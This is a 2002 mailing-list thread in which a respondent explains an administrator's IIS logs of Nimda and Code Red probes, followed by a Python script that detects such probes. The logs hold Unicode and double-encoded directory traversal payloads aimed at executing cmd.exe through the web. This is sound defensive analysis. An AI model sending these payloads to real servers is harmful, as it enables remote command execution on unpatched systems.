> > > Hello all and forgive my ignorance in this area.

Hello

> > Below is a snippet from the logs. Can anyone tell by looking at it:
> >
> > 1. What type of vulnerabilities were they looking for?

Look downward.

> 2. Does the fact that it says <Rejected by urlscan> imply that URLScan from M$
> is loaded. I didn't do this myself... that's why I'm curious.

I don't really know either.

> 3. What is the best course of action in regards to the individual attempting
> these activities? I traced the IP back to RoadRunner. Should I call their
> customer service and complain or am I just pissing in the wind?

You will piss in the wind, I think...

> 4. I did run the IIS Lockdown wizard. Is that sufficient for most types of
> attacks? What other tools should I consider running?

Don't hesitate to apply security patches as soon as they are released!

> 2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/root.exe 404 123 -

This tests if your IIS has been infected by a virus like Nimda or Code Red.
root.exe is a copy of cmd.exe to give access to the console via web.

> 2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/MSADC/root.exe 404 123 -

IDEM (I suppose)

> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/c/winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/d/winnt/system32/cmd.exe 404 123 -

IDEM

> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c../winnt/system32/cmd.exe 404 123 -

This tests a Unicode vulnerability (the dot-dot attack): scripts has execute
rights, so they try to execute cmd.exe to access the console via web :)

> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 123 -

IDEM

> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 123 -

IDEM

> 2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 404 123 -

IDEM

> 2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:05 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:09 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:11 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%252f../winnt/system32/cmd.exe 404 123 -

IDEM for all

> > Thanks so much for this great list.
> >
> > Craig Brauckmiller
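As an added example (not part of the thread, and not anyone's production tool), the probes quoted above can be recognised in an IIS W3C log by decoding each request the way the vulnerable server would have: repeated percent-decoding collapses the double encodings (%255c, %%35%63, %25%35%63), and a lenient two-byte UTF-8 decode resolves the overlong forms (%c0%af, %c1%1c, %c1%9c) that the Unicode bug accepted, after which traversal to cmd.exe or root.exe is a plain string match. The sample lines are constructed in the layout of the excerpt and carry the original request paths rather than the `/<Rejected-By-UrlScan>` stem that UrlScan substitutes; the field positions and the `TARGETS` list are this example's assumptions.

```python
from urllib.parse import unquote_to_bytes

# Constructed IIS W3C-style lines in the layout of the thread's excerpt
# (date time c-ip - s-ip s-port method uri-stem status bytes -).
SAMPLE_LOG = """\
2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 GET /scripts/root.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /scripts/..%255c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:09 65.27.56.236 - 10.2.32.20 80 GET /scripts/..%%35%63../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:30 10.2.32.99 - 10.2.32.20 80 GET /default.htm 200 4096 -
""".splitlines()
TARGETS = {"cmd.exe", "root.exe"}  # console via web; root.exe is a copied cmd.exe

def percent_decode(uri: str) -> bytes:
    """Decode until stable so double encodings (%255c, %%35%63) collapse to %5c."""
    data = uri.encode("latin-1", "replace")
    for _ in range(3):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data

def lenient_utf8(data: bytes) -> str:
    """Decode 2-byte pairs without rejecting overlong forms: %c0%af -> '/', %c1%9c -> '\\'."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):  # lead byte + (any) continuation
            b, i = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F), i + 1
        out.append(chr(b))
        i += 1
    return "".join(out)

def classify(uri: str):
    """'traversal-to-cmd.exe', 'direct-root.exe', ... or None for a benign request."""
    path = lenient_utf8(percent_decode(uri.split("?", 1)[0]))
    path = path.replace("\\", "/").lower()  # IIS treats '\' and '/' alike
    name = path.rsplit("/", 1)[-1]
    kind = "traversal-to-" if "/../" in path else "direct-"
    return kind + name if name in TARGETS else None

def scan_log(lines):
    """Return (client_ip, uri, label) for every line that looks like a probe."""
    hits = []
    for line in lines:
        f = line.split()
        if len(f) >= 9 and (label := classify(f[7])):
            hits.append((f[2], f[7], label))
    return hits
```

Running `scan_log(SAMPLE_LOG)` flags the four probe lines from one client and leaves the `/default.htm` request alone; the same canonicalisation is what makes a single `..` rule catch every encoding variant in the excerpt.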